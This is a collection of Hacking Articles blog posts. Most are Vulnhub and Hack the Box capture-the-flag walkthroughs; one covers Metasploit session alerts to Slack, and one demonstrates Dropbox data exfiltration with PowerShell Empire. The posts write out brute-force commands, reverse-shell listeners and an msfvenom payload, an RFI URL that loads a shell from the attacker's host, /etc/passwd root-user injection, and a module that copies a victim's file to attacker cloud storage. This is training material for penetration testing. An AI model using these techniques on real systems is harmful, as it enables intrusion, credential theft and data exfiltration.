Hello Friends!! Today we are going to take another CTF challenge named “Born2Root: 2”. The credit for making this VM machine goes to “Hadi Mene”. It is available on the Vulnhub website. Although there is no description provided at the current time on the Vulnhub website, we assume that we will have to gain the root access and find a flag.

Security Level: Intermediate

Penetrating Methodology

• Scanning
• Enumeration
• Exploitation
• Privilege Escalation
• Capture the Flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found out target: 192.168.1.9

Time to scan the Target’s IP with nmap. Nmap scan result shows 3 major ports open, 22(SSH), 88(HTTP) and 111(RPC).    

nmap -A 192.168.1.9

Since port 80 is running HTTP, so we considered opening the Target IP Address on the Browser. This gives us an attractive looking webpage although after spending a considerable amount of time. We found that this is nothing but a distraction. We couldn’t find anything of importance on the website. 

So now we moved on to try the Directory Bruteforcing to get any hints. The drib scan gives us the Joomla directory. This is a major breakthrough. Now it’s time to exploit machine through Joomla.

dirb http://192.168.1.9/

Now that we have found the joomla directory, we will browse the joomla directory on our browser. Here we have the blog made by the author. This is titled Tim’s Blog. This could be a hint for a username. Let’s keep that in mind. Now as we can see that we have a Login Form in the bottom right. Now we will have to guess the user credentials.

Now, it is by convention to try the default credentials first. A quick search, informs us that the default username for Joomla is ‘admin’. Now for the password, we will have to perform a dictionary attack. For that, we will create a dictionary from the words present on the webpage using ‘cewl’.

cewl http://192.168.1.9/joomla/ > dict.txt

Now that we have the dictionary named dict.txt. Its time to perform the bruteforce. We will use the BurpSuite to perform the bruteforce. To learn more about this, refer to this article. This bruteforce force gives us “travel” as the password.

Now we will use these credentials to login in Joomla:

Username: admin
Password: travel

Now that we have logged in on the Joomla as the SuperUser. To exploit the Joomla server, we will use the php reverse shell. They can be found in Kali Linux. We will move on to the Template Section. To do so, we will first click on the Extensions Option on the Menu. Then, traverse in the beez3 template and choose Customise. This is open an edit section as shown in the image. Now, select the index.php and replace the text inside the index.php with our reverse shell. Remember to change the IP Address and/or change the port.

After editing the index.php, save the file by clicking on the Save Button. Now we have successfully replaced the index.php with our reverse shell script. Now, all that’s left to do is run the index.php. Now to get a session, we need a listener, where we will get our reverse shell. We will use netcat for creating a listener as shown in the image given below.

After we got the shell, now it was time to enumerate the machine in order to exploit further. It took us a couple of hours of hard work around the machine. We ran a bunch of scripts and much else. At last, our search at the ended when we stumbled upon the opt directory. Inside this directory, we found the scripts directory and that contained the fileshare.py. Upon close inspection of the fileshare.py file, we got the login credentials as shown in the given image.

nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
cd /opt
ls
cd scripts
ls
cat fileshare.py

After finding the credentials all that was left was to login as Tim. For that we used the su command and gave the following credentials:

Username: tim
Password: lulzlol

After logging in as Tim, we ran the sudo with -l parameter to give us the user rights of the user tim. As we can see in the given image, tim has all the permissions. After this, we traversed inside the root directory using the cd command. Here we found the final flag.

su tim
sudo -l
sudo su
cd /root
ls
cat flag.txt

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Born2Root: 2: Vulnhub Walkthrough appeared first on Hacking Articles.

You’re going to learn ShellHerder in this post. It is a technique used to monitor all the sessions of Metasploit/Meterpreter. The basic idea to create it, that new incoming sessions could be easily monitored when Intruder cannot access the listener. This approach is quite helpful when a Pen-tester wants to get an alert for live phishing campaigns or another attack by monitoring for new sessions.

Table of Content

Introduction to ShellHerder

Registering on Slack

• Add WebHooks App
• Configure WebHooks App

Download & Configure ShellHerder

Working Demo

Introduction to ShellHerder

ShellHerder uses session subscriptions to monitor activity and then sends an alert to Slack using Slack’s Incoming WebHooks. The alert is sent using the WebHook URL and a POST request and will tag a specified username and provide the computer name of the server with the session.

Registering on Slack

We need a workspace on slack to use slack. To do this we need to register on slack. To create a new workspace on slack, click here. This will require an email address. After that, it is required to create a channel. Here, we named our channel “live server”.

Add WebHooks App

To receive the updates from the Metasploit, we need to an app installed in the channel. Webhooks is the app that is perfect for this job. Now in order to add Webhooks, we first clicked on the Add an app Button inside our channel. Now, we will search for incoming Webhook and add it.

Configure WebHooks App

After adding the Webhooks, we will be asked to configure some settings for the app. This will include the configuring the channel on which the incoming notifications will be broadcasted. Here we select our channel and click on the Add Integration Button.

After clicking the Add integration button, we will be presented with the WebHooks URL. Copy this URL, we are going to need it while we configure Notify.

Download & Configure ShellHerder

Now, we need to work upon our Kali Linux. We are going to use Shell Herder to connect to slack. This Metasploit plugin is aimed to keep an eye on the sessions. All including the ones which are opened or closed. It uses session subscriptions to monitor activities and can be linked to slack, which we just got setup.

git clone https://github.com/chrismaddalena/ShellHerder.git

After downloading Shell Herder via git clone, we moved the directory inside the Metasploit Framework. So that we can use it directly inside the Framework. After copying the directory, we open an instance of the Metasploit Framework and load the notify plugin as shown in the image given image.

Now, we will use the command notify_show_options to check for any pre-configured settings. Now that we can’t find any. It was time to set the Webhook URL, which we copied earlier and add it inside the notify plugin. Also, we set the Slack User id and Source. After entering the relevant data, use the save command to save the configuration. Now that we have configured the Notify, Let us send a test message to see if the configuration is correct and working.

load notify
notify_show_options
notify_set_webhook <Above webhook URL>
notify_set_user @Ignitelab
notify_set_source Kali-Linux
notify_save
notify_test

As we can see in the given image that, the slack received the test message we sent via Notify.

Working Demo

Now, to test the real working of Notify, we will exploit a machine, so that we can observe, whether or not it will notify us, when we get a session. We are exploiting a Windows machine using web delivery.

As we expected, we got the notification on our slack channel, as soon as we got the session.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher  Contact Here

The post Get Meterpreter Session Alert over slack appeared first on Hacking Articles.

Today we are going to take another boot2root challenge known as “DC-4”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download it from here

Security Level: Beginner

Penetrating Methodology

Scanning

• Discovering Targets IP
• Network scanning (Nmap)

Exploiting

• Surfing HTTP service port
• HTTP Login credential Bruteforce (Burpsuite)
• Command Injection
• SSH Login Credentials Bruteforce (Hydra)

Lateral Movement

• Logging into SSH and Enumerating Directories
• Obtain credentials in /var/mail directory

Privilege Escalation

• Check Sudo rights
• Adding new user /etc/passwd with sudo
• Access root directory
• Capture the flag

Walkthrough

Scanning

Let’s start off with scanning the network to find our target.

netdiscover

We found our Targets IP Address 192.168.1.101. Our next step is to scan our targets IP Address with nmap.

nmap -A 192.168.1.101

Exploiting

From nmap result we found HTTP service is running on port 80. So, we browsed the Targets IP Address in the browser and found an Admin Information Security Login page. We clearly need to find credentials for it.  Let’s work on that.

We found that the HTTP service runs on port 80, from nmap results. So, we browse the IP address of Targets in the browser and found the Admin Information Security Login page. Now credentials need to be found for login, Let’s work on this.

We Fired UP!! burpsuite using rockyou.txt to get valid login.

Username- admin

After bruteforcing, we have found the password for Admin i.e

Password- happy

We have successfully logged in as Admin. Under system tools, the hyperlink command looks suspicious here. So, let’s check it out.

Command option looks useful as It displayed some options to Run Command. Here we used list file option which displayed files of the database. We also got a hint from the ls command which executes ls-l, we might make some changes in it.

So, we captured the Webpage request using Burpsuite and Send the request to the repeater. Here we can make the desired changes to the request and check out its response.

Let’s check out subdirectories in the /home directory. We have found 3 users i.e Charles, Jim and Sam.

Exploring the home directory for user Jim, after that, we checked out the backups folder.

We have found a old-passwords.bak file is a backup password file.

Exploring the contents of the file, we found a list of passwords. They might come in handy later.

We thought of checking /etc/passwd is readable or not and found some useful usernames.

We have created a dictionary for users and passwords with the previously discovered credentials. Let’s bruteforce for ssh login using hydra.

hydra -L users -P passwords 192.168.1.101 ssh

So, the credentials found:

Login- jim

Password- jibril04

Lateral Moment

Logging into ssh using the credentials.

Username- jim
Password- jibril04
ssh jim@192.168.1.101

While enumeration, we found two files and read their contents. But they didn’t give direct clue to move ahead.

ls
cat test.sh
cat mbox

when I open mbox, I saw a test mail in this, send by root to jim.

After some time thinking, it suddenly strikes us to check the /var/mail folder. Maybe it might contain something, and our instinct was right. We have found some credentials.

Username- Charles
Password- ^xHhA&hvim0y

Privilege Escalation

Let’s login into charles with password ^xHhA&hvim0y.

su charles

After enumeration, we check sudo right for Charles and found that he run the editor teehee as root with no password. After that, we have added raaj in the etc/passwd using echo and teehee as shown.

sudo -l
echo "raaj::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

Logging into raaj as root user and inside the root directory, we have found our FINAL FLAG.

su raaj
cd /root
ls
cat flag.txt

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 3 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

The post DC-4 Vulnhub Walkthrough appeared first on Hacking Articles.

Today we are going to take on another challenge known as “DEVELOPMENT”. This is designed for OSCP practice, and the original version of the machine was used for a CTF. It is now revived and made

slightly more nefarious than the original. The author of this VM machine is “Donavan”. Our goal is to get the flag to complete the challenge.

Download it from here: https://download.vulnhub.com/digitalworld/devt-improved.7z

Security Level: Intermediate

Penetrating Methodology:

Scanning

• Netdiscover
• NMAP

Enumeration

• Run http service
• Web spidering

Exploiting

• Remote File Inclusion
• Ssh login

Privilege Escalation

• Exploit sudo rights
• adding new user

Capture the Flag

Walkthrough

Scanning:

Let’s start off by scanning the network and identifying host IPs. As illustrated below, we can identify our host IP as 192.168.1.104.

netdiscover

Time to scan the Target’s IP with Nmap.

nmap -sV 192.168.1.104

We can clearly see from screenshot a few open ports e.g. 22(ssh),139(NetBIOS-ssn), 445(NetBIOS-ssn), 8080(http-proxy).

Enumeration

Since port 8080 is running HTTP-proxy, so our obvious choice is to browse Target’s IP in the browser. Here we got a clue about some html_pages. It could either be any Directory or a webpage.

So, let’s dig into the source code if we can find something useful. Here they are talking about some Development secret page and Patrick is being mentioned, he could be a user:

Now moving ahead lets surf through the webpage mentioned earlier which is html_pages. Here again, we can see a few html files in which “development.html” could be of our interest.

When you visit development.html, you can find a mention of “hackersecretpage” nothing else seems useful.

Again we went through the source code of the same and found “./developmentsecretpage” .This seems our secret page.

If you visit the page, it is confirming to be the Development secret page and a PHP file link named ‘Patrick’.

If we visit the file link it opens a page with another file included in it named ‘Sitemap’.

And when we visit /sitemap.php, we clicked on the embedded link stating “Click here to logout” which turned out to be Login page.

Exploitation

We just tried random login credentials “admin” for both username and password and 1234 that’s a success.  

Here we are getting a short of error message on the top of the page. So we Googled about it. 

We found an exploit for the same listed on Exploit-db with the name of “/[path]/slog_users.txt” which is vulnerable to RFI. Refer CVE code: 2008-5762/63.

When we appended the slog_users.txt file with our webpage we found four users and their password hashes.

After decrypting the hashes, we got passwords in clear text for an intern, Patrick and qiu respectively but not for Admin.

Privilege Escalation

As we knew port 22 is open for ssh so here I try to login into ssh using intern and we got access of ssh as shown below. After that, we found a list of commands that are allowed to run here. Then we checklist of files using ‘ls’ as it was one of the allowed commands. We found two text files here ‘local.txt’ and ‘work.txt’ but when we try to open them, we failed.

ssh intern@192.168.1.104
?
ls
cat local.txt

Hmm! we got access of restricted shell where we can run only a few commands allowed by admin. So, to import proper tty shell, we can import ‘/bin/bash’ by using the following command:

echo os.system('/bin/bash')
cat local.txt
cat work.txt

Next, we try again accessing the same ‘local.txt’ file and it just shows a congratulatory message, so we moved on to work.txt, here as well it is showing we have to move further with user Patrick and we already knew Patrick’s password.

NOTE: At first attempt, you will get an error SSH connection refuse, therefore restart the Vulnerable machine to get connect with SSH.

After logging in as patrick, we check the sudo rights for him where I found Patrick has ALL Users permissions including root user to run vim and nano as shown below.

su patrick
sudo -l

In another terminal in my local machine, I have generated a new encrypted password: pass123 whose salt is ignite using OpenSSL and copy the salt password.

openssl passwd -1 -salt ignite pass123

Next, by providing sudo access to any editor(either vim or nano ) we can read as well as edit any system file which is restricted to access by any lower privilege user such as /etc/passwd file.  

Since Patrick has sudo rights which means he can modify the root files too, therefore I decided to insert a new user with root privilege in the /etc/passwd file.

sudo nano /etc/passwd

As you can see in the screenshot below, we have added a user ‘RAJ’ and with an encrypted password and we have given all root privileges to it as well.

raj:$1$ignite$3etbJm9809Hz.K1NTdNxe1:0:0:root:/root:/bin/bash

Capturing the flag

What we are waiting for, lets login using raj. Hereafter listing the content we found the proof.txt file from the inside root directory. we opened it using cat and captured the flag.

su raj
ls
cat proof.txt

Author: Nisha Yadav is trained in Certified Ethical hacking and Bug Bounty Hunter. She is currently working at Ignite Technologies as a Security Analyst. Connect with her here

The post Development: Vulnhub Walkthrough appeared first on Hacking Articles.

Today we will be solving a boot2root lab from Vulnhub called Sputnick:1. This lab, like many others, is a good way to keep your penetration testing skills sharp while getting some variety.

Level: Easy

Task: To find flag.txt

Table of Content

Scanning 

• Open ports and Running services (Nmap)

Enumeration 

• Web Directory search 
• Credential harvesting

Exploitation 

• Splunk reverse and bind shell
• Python reverse shell
• Accessing shell

Privilege Escalation

• Capture flag.txt

Scanning

We start by scanning the network for targets using Netdiscover

netdiscover

So we found target IP 192.168.1.103 and proceed by running a Nmap scan for all its ports to see what we can find.

nmap -p- -A 192.168.1.103

Enumeration

The scan shows us we have port 8089, 8191, 55555 and 61337 open. Port 55555 has an associated IP address and a directory link for git repository; we investigate it to see what we can find. We copy and paste it into our browser.

We access the “Logs” directory and click on the “HEAD” file within.

There is a link for a Git page, we go to the link and find Flappy. Git clone is used to clone and download the file to our system for further investigation.

Once the file in downloaded we explore its contents but nothing stands out, so we access their logs.

git clone https://github.com/ameerpornillos/flappy
git log

We see that the command gave us the logs for our file and the search starts. We focus on the commit’s and start searching through them.

Finally, we come across the highlighted commit and strike gold!

We use the “ls-tree” to get an indented listing of the file.

The screenshot shows a file named “secret”; we used the git show command on its string to see what is reveals

git ls-tree 07fda135aae22fa7869b3de9e450ff7cacfbc717
git show f4385198ce1cab56e0b2a1c55e8863040045b085

Now, what could this be? We recalled seeing a Splunk service running on port 61337, we accessed it on our browser to find a login screen for Splunk.

192.168.1.103:61337

Exploitation (Splunk)

The information we got earlier from the previous screenshot is in fact login credentials. The username is “sputnik” and the password is “ameer_says_thank_you_and_god_job”, we enter these and are able to get into the Splunk account.

We looked around for a while and then decided to upload a shell to the account. On searching, we found a way to weaponize Splunk with reverse and bind shell from https://github.com/TBGSecurity/splunk_shells

The .gz file from the link was saved on our system, we navigate to the “App: Search & Reporting” option and click on “Search & Reporting”

Click on the “Install app from file” option.

Using the browse option, we find our shell, select it and upload it.

Click on the “Restart Now” to restart the application.

We scroll down to find our shell file as shown below. Before we can run, it we need to click on the “Permissions” option to change its permissions.

Configuration files need to be added in order to run the shell successfully, here we set permission to everyone and at the bottom, we click on the “All apps” radio button and save this change.

Now to execute the shell. We navigate to the search option in Splunk and type in our command defining that we want a reverse shell of standard type to talk to out attach machines IP on the listening port.

| revshell std 192.168.1.110 1234

Access Victim’s Shell

Netcat is running on our machine listening on port 1234 and see shell talking back.

The “id” command was used to no avail so we decided to step it up a notch.

nc -lvp 1234

We used Msfvenom to create a python payload.

msfvenom -p cmd/unix/reverse_python lhost=192.168.1.110 lport=4444 R

The payload is uploaded through our existing Netcat session, all that needed to be done was the payload to be pasted into the terminal and executed.

nc -lvp 1234

A new Netcat session is started on the port (4444) that we defined in our payload and we see the execution occur flawlessly.

Privilege Escalation

We run the “id” command to see that our user is “splunk”.

Time privilege escalation. On the splunk prompt, we first run the “sudo -l” command and enter the password that we used earlier to log into Splunk “ameer_says_thank_you_and_good_job” where we found splunk user can ed as root.

So close to root! Now, all we have to do is run the “sudo ed” command and then the “!/bin/sh” command. Type in “id” and there you go! We have root!

id
sudo -l
ameer_says_thank_you_and_good_job
sudo ed
!/bin/sh

Time to look for our flag.

We look in the root directory to find “flag.txt” and use “cat” to open it. Hooray for us!

As always, we at Hacking Articles hope you enjoy this lab and share it with your collogues. This lab has a great feature that gives you an insight into exploiting Splunk. Overall the lab is easy and the level of frustration it might induce is minimal.

Have fun and stay ethical.

About The Author

Abhimanyu Dev is a Certified Ethical Hacker, penetration tester, information security analyst and researcher. Connect with him here

The post Sputnik 1: Vulnhub Walkthrough appeared first on Hacking Articles.

Today we will be solving a boot2root lab from Vulnhub called SILKY-1. This lab, like many others, is a good way to keep your penetration testing skills sharp while getting some variety.

Download it from here: https://www.vulnhub.com/series/silky-ctf,207/

Level: Easy-Intermediate

Task: Boot to Root (flag.txt)

Penetration Methodologies

Scanning

• Netdiscover
• Nmap

Enumeration

• Web Spreading
• txt
• Generating Password Dictionary (Crunch)

Exploit

• Brute force attack (Hydra)
• SSH Login

Identify SUID Enable Binaries

• Privilege Escalation
• Exploit PATH Variable

Capture the flag

Walkthrough

Scanning

We start by scanning the network for targets using Netdiscover.

netdiscover

So we found target IP 192.168.1.106 and proceed by running a Nmap scan for all its ports to see what we can find.

nmap -A 192.168.1.106

Since port 8080 is running HTTP-proxy, so our obvious choice is to browse Target’s IP in the browser but didn’t find any hint.

Enumeration

We checked the robots.txt file for the results of nmap and showed /notes.txt as our next indication.

So, we found a text message that is written in German when we explored the notes.txt file.

With the help of Google translator, I translate the German message, which was connected to password hint:

“I absolutely have to remove the password from the page, after all, the last 2 characters are missing. But still.”

Then again, I visit the home page to view its source code and found a link for script.js

So, I found the word: s1lKy when navigating to /script.js as shown below.  Hmmm!!! This word s1lKy could be the possible password as said in the above text message.

So, without wasting time I decided to generate a dictionary with the help of crunch. As per the text message last 2 characters are missing. But these 2 characters could be any combination such as alpha-alpha, alpha-ALPHA, alpha-numeric, alpha-special character or vice-versa and so on.

And after spending almost one-an-hour I successfully found the valid combination for ssh login as port 22 is opened.

crunch 7 7 -t s1lky^% >> pass.txt

Exploit

Assuming username could be silky, and password could be in pass.txt, I lunched brute force attack using hydra on port 22 for identifying the valid combination of ssh login.

hydra -l silky -P pass.txt 192.168.1.106 ssh

Since we found silky:s1lky#5 as username and password for ssh login, now it was time to access ssh shell and escalated the root privilege to capture the flag.

ssh silky@192.168.1.106

Once I logged in successfully than without wasting much time, I looked for SUID enabled binaries and here /usr/bin/sky looks interesting.

find / -perm -u=s -type f 2>/dev/null

Although when I run this program it shown “root” in its output as a result along with some German text. To analysis its result I try to inspect the program script with the help of strings which a command line utility to identify the file type.

stings /usr/bin/sky

Hmm!! the information I found through strings was that this program is executing to commands simultaneously. First, echo command to show the German text message and another whoami.

Privilege Escalation

To escalated root privilege, we can abuse PATH Variable as shown below and for more detail read the complete article from here.

echo '/bin/sh' > whoami
chmod 777 whoami
export PATH=/tmp:$PATH
/usr/bin/sky

OKAY!! We got another shell which is a root shell as shown below, let’s now grab the flag.txt file and complete the challenge.

id
cd /root
flag.txt

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Silky-CTF: 0x01: Vulnhub Walkthrough appeared first on Hacking Articles.

Today we are going to take on another boot2root challenge “uknowndevice64 v2.0” by Ajay Verma. Our goal is to get root and read flag.txt with at least two different ways.

Download it from here: //download.vulnhub.com/unknowndevice64/unknowndevice64-V2.0.ova

Difficulty: Beginner

Penetrating Methodology:

Scanning

• Netdiscover
• NMAP

Enumeration

• Web Directory search 
• Credential harvesting

Exploiting

• SSH login (1^st Method)
• ADB login (2^nd Method)

Privilege Escalation

• Exploit sudo rights

Capture the Flag

Walkthrough

Scanning:

Let’s start off by scanning the network and identifying host IPs. We can identify our host IP as 192.168.1.22 by using netdiscover. Next, we have to scan this IP using nmap.

netdiscover
nmap -p- -A 192.168.1.22

The result shows that freeciv is running on port 5555, ssh is running on port 6465 and netbus is running on 12345.

First, we try to open the IP into browser with port 12345 we were prompted to login. So, we tried the basic credentials with different combinations and got succeeded with ‘Administrator’ as username and password as ‘password’.

After logging in, a webpage appeared as you can see here. But nothing of our use. 

Then tried to access the robots.txt file. We got lucky and found a file here named ‘./info.php’ inside it.   

When we opened this in the browser, we are prompted to download it.

When we open this downloaded file, we got an SSH private key inside it. So, we copied the text from “BEGIN RSA PRIVATE KEY” to “END RSA PRIVATE KEY” and saved it in a file named ‘sshkey’. Besides this key we can see “unkn0wnd3vic3-64” at the end of the file, let’s save this as of now.   

Here first we have changed permission for the file ‘sshkey’. Then login into ssh using this file on port 6465(as ssh is running on port 6465). And we are asked to enter a passphrase for this ssh key.so we used the text “unkn0wnd3vic3-64” that we saved from info.php and it worked. After that, we switched as root user and listed the content of root.

chmod 600 sshkey
ssh -i sshkey 192.168.1.22 -p 6465
su root
ls

We spotted a directory named ‘system’ and inside system, we found a file ‘flag.txt’. This is our flag!    

Another way

We will be using previously gained information to save time. As we knew from Nmap scan that freeciv is running on port 5555 so tried to connect it with adb. After getting a shell, we switched to root and captured the flag (as we already knew the flag is inside flag.txt within system directory).

abd connect 192.168.1.22:5555
abd shell
su root
cat system/flag.txt

Finally!! The challenge is completed, and we have grabbed the flag.txt file using two different approaches.

Author: Nisha Yadav is trained in Certified Ethical hacking and Bug Bounty Hunter. She is currently working at Ignite Technologies as a Security Analyst. Connect with her here

The post unknowndevice64 v2.0: Vulnhub Walkthrough appeared first on Hacking Articles.

Today we will be solving a boot2root lab from Vulnhub called Bravery. This lab, like many others, is a good way to keep your penetration testing skills sharp while getting some variety.

Download it from here: //www.vulnhub.com/entry/digitalworldlocal-bravery,281/

Penetration Methodologies

Scanning

• Netdiscover
• Nmap

Enumeration

• Mount NFS share directory
• SMB shared file enumeration

Exploiting

• Abusing CMS via RFI
• Obtaining reverse shell via netcat

Privilege Escalation

• Abusing SUID binary
• Capture the Flag

Walkthrough

Scanning

Let’s start with network scanning to identify the IP of VM with the help of netdiscover.

So we have our target IP 192.168.1.105 now, let’s scan services and ports via nmap.

nmap -A 192.168.1.105

We got a fruitful result from nmap scan as we saw so many services were running on the various port.

Enumeration

We found network share service is available via port 2049, so we thought to check shared directory in the network. We have therefore installed NFS-client on our local machine and have a command to identify the shared directory available to mount on our local computer.

showmount -e 192.168.1.105

we found /var/nfsshare is a shared directory that we can mount in our local machine as given below:

mkdir /tmp/raj
mount -t nfs 192.168.1.105:/var/nfsshare /tmp/raj
cd /tmp/raj
ls
cat discovery
cat enumeration
cat explore
cat password.txt
cat qwertyuioplkjhgfdsazxcvbnm

Hmmm!!! After exploring all files, we concluded that “qwertyuioplkjhgfdsazxcvbnm” could be the password.

Because port 445 is also available for SMB, even we have also obtained a password recently thus we can try connecting to SMB to list shared folders. But first we need to enumerate SMB shared directory and for that, we can go with Enum4linux.

enum4linux 192.168.1.105

As you can observe, enum4linux showed two shared folders: anonymous and secured. And we can access them with the help of smb-client.

smbclient //192.168.1.105/anonymous
password: qwertyuioplkjhgfdsazxcvbnm

We have successfully accessed the shared folder “anonymous”, where I have seen some user’s folders. But while doing an internal recon, I didn’t notice any interesting clues.

So, I’m moving to another “secured” folder and here I found three files, which I downloaded on my local computer.

smbclient //192.168.1.105/secured -U David
password: qwertyuioplkjhgfdsazxcvbnm
get david.txt
get genevieve.txt
get README.txt

Then, each file opened, and some helpful URLs were found, we’re going to navigate them one by one, moreover, the last line was pitching for any CMS login.

Initially, we looked at the URL given below but that was no use to us.

//192.168.1.105/devlopmentsecretpage

We then explored another URL and found no useful stuff here, too.

//192.168.1.105/devops/directortestpagev1.php

At last we move to the third and final URL found from the genevieve.txt. Fortunately, I found the following web page differing from two previous results and it could have been CMS.

I found a Cuppa CMS login page by exploring other tabs. This might be a turning point as we are attempting to exploit CMS cuppa.

Exploiting

I dig out cuppa exploit from inside the searchsploit without wasting time and the CMS is vulnerable to LFI/RFI.

Thus, I found a Remote Inclusion File URL when I checked the POC. We now have to be prepared with a reverse shell for the exploitation of RFI.

Therefore, I used php-reverse-shell from inside /usr/share/webshell/php and modified the listening IP with Kali’s IP then launch Python HTTP server for file transferring and start netcat listener on listening port.

When everything is ready! Just trigger the following URL to exploit RFI.

//192.168.1.105/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=//192.168.1.110:8000/shell.php?

We’ll get a netcat session for the victim’s machine as soon as we trigger the URL. Now we have a low privilege shell and we need to enhance privilege in order to achieve a higher privilege shell. Therefore, to find SUID enable binaries, I run the following command.

find / -perm -u=s -type f 2>/dev/null

Hmmm! So here I notice cp (copy command) has SUID permission that means I can copy any file as root. Now let’s try to escalate the privilege by exploiting SUID enable binary by copying our edited /etc/passwd file inside the victim’s machine.

Privilege Escalation

Suppose I would like to create a new user (raj) with root privilege inside /etc/password file of victim’s machine. So first we need to copy the content of /etc/passwd file in a text file inside our local machine and then with the help of OpenSSL generates the salt password for user raj and then copy the salt value.

Now open the text file where you have pasted the content of /etc/passwd of victim’s machine and add a new row for user raj along with the salt value that we have generated. Named the file as passwd and transfer this file into victim machine, so that we can replace our /etc/passwd file with original /etc/passwd file of the VM.

For downloading /etc/passwd file into Victim’s machine, execute the following command and get the root access to grab the flag.

cd /tmp
wget //192.168.1.110:8000/passwd
cp passwd /etc/passwd
su raj
cd /root
ls
cat proof.txt

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post digitalworld.local-BRAVERY: Vulnhub Walkthrough appeared first on Hacking Articles.

Today we are going to solve another CTF challenge “lightweight”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available, therefore, they have a static IP. The IP of lightweight is 10.10.10.119

Penetration Methodologies

Scanning

• Network Scanning (Nmap)

Enumeration

• Ldap database Enumerate (Nmap NSE-script)
• HTTP surfing

Exploiting

• Connect to SSH
• Identify capability folder
• Sniffing password via tcpdump
• Obtain user.txt

Privilege Escalation

• Extracting backup.7z
• Identify another user’s credential
• Exploit openssl capability
• Obtain root.xt

Walkthrough

Scanning

Let’s start off with our basic Nmap command to find out the open ports and services.

nmap -A 10.10.10.119

As you can observe that it has shown port 389 is open for LDAP services and 22 & 80 are available for ssh and http respectively.

Enumeration

Therefore, with the help of nmap NSE script we go for LDAP enumeration:

nmap -Pn -p 389 --script ldap-search 10.10.10.119

Luckily! Nmap listed two ldapuser1, ldapuser2 usernames along with a hash of their password from the result of nmap scan, yet we did not crack them.

Since we know that http service was running on port 80 therefore, we navigate to a web browser and browse target IP and welcome by following page where we saw “This site is protected by against brute forcing ” that mean fail2ban could be running inside VM moreover we found three hyperlinks.

When I opened the user.php hyperlink I read the highlighted text and according to this text, a user in the machine has been automatically added for us.

Exploiting

Therefore, I try to connect with SSH by using 10.10.14.10:10.10.14.10 as login credential. At this point, I was not sure what should be done to extract hidden flag, therefore, I thought to identify the binary capability files with the help of getcap and saw the fruitful result.

ssh 10.10.14.10@10.10.10.119
getcap -r / 2>/dev/null

As we have seen in the above image that tcpdump has the capabilities to capture all network traffic even in low-privileged access, therefore I trigger the following command to inspect LDAP connection traffic if possible.

tcpdump -i any -X port ldap

And then navigate to the browser to activate authentication via status.php, since the loading takes time. There’s something behind the action has to happen.

As result, we observe the following traffic, as predicted, where I found the ldapuser2 password in plaintext.

Then we switch the user with the following credential and obtain our first flag user.txt

Username: ldapuser2
Password: 8bc8251332abe1d7f105d3e53ad39ac2

Privilege Escalation

Inside the directory /ldapuser2, I found an archive as backup.7z and for its inspection, we need to transfer this file mine in our local machine.

cat backuo.7z | base64

So, I copied it in our machine and try to extract the file, but it was password protected.

Then, by using an online link “lostmyoass.com,” I try to break the password key and then find out the cracked password: delete as in the image below.

And use the “delete” password to extract the directory. I found some php files here and we looked for a status.php file among those files.

The status.php file reveals the password of ldapuser1 as shown in the image.

Thus, we switched to ldapuser1 and navigate inside the directory of ldapuser1

su ldapuser1
password: f3ca9d298a553da117442deeb6fa932d

This time once again I checked for file capacity where I saw OpenSSL has all privileges to read a file that owned root user and therefore we decided to grab root.txt directly through OpenSSL.

getcap -r / 2>/dev/null
./openssl base64 -a -in /root/root.txt | base64 -d

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Lightweight: Hack the Box Walkthrough appeared first on Hacking Articles.

In our previous post, we had already discussed “Command and Control with DropboxC2”  But we are going to demonstrate Data Exfiltration by using PowerShell Empire where we will extract the unauthorized data inside our Dropbox account. Here you will learn how an intruder can exfiltrate data over cloud storage.

What is Data Exfiltration

Data exfiltration occurs when malware and/or a malicious actor carries out an unauthorized data transfer from a computer. It is also commonly called data extrusion or data exportation. Data exfiltration is also considered a form of data theft. During the past couple of decades, a number of data exfiltration efforts severely damaged the consumer confidence, corporate valuation, and intellectual property of businesses and national security of governments across the world.

Methods of Data Exfiltration

Open Methods:

• HTTP/HTTPS Downloads & Uploads
• FTP
• Email
• Instant Messaging
• P2P filesharing

Concealed Methods:

• SSH
• VPN
• Protocol Tunneling
• Cloud Storage Uploads
• Steganography
• Timing channel

(From Wikipedia)

Generate Token Via Dropbox API

In order to do that, this tool requires a Dropbox API. To get that, first, create an account on Dropbox. Then after creating the account, head to developer tools here. A webpage will open similar to the one shown below. Here we will select the “Dropbox API”. Then in the type of access section, we will choose “App folder”. Name the app as per choice. Then click on Create App Button to proceed.

This will lead to another webpage as shown below. Here, move on to the O Auth 2 Section, and

Generate access token. This will give the Dropbox API required for this particular practical; now copy the generated token.

Data Exfiltration

Now we are going to use Powershell empire for exfiltration, considering we have already compromised the victim machine and we are about to complete our mission by copying data from inside the victim without his knowledge.

As you can observe we have Empire-agent which means I have already spawned shell of victim’s machine and Empire has post exploit for data exfiltration where we will use the above token.

usemodule exfiltration/exfil_dropbox
set SourceFilePath C:\Users\raj\Desktop\notes.txt
set TargetFilePath /Apps/notes.txt
set ApiKey <API Token>
execute

As you can observe that I have notes.txt inside /my files which means we have successfully transferred the data from a source location to destination.

Thus, in this way, we have successfully transferred the data from the victim’s machine to our dropbox and hence this technique is known as dropbox exfiltration.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Data Exfiltration using PowerShell Empire appeared first on Hacking Articles.

